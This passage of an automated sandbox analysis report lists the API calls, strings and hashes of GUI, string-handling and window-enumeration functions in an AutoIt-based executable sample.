                                                                                                                                                                                                                                                                                                                                                                                                                Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 867697134-248962490
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32 ref: 0044A277
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1744303182-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 790654849-1810252412
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1896584978
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1322021666-1919597938
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                                                                                                                                                                                                                                                                                                • strncnt.LIBCMT ref: 00428646
                                                                                                                                                                                                                                                                                                                                                                                                                • strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1776594460-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00454708
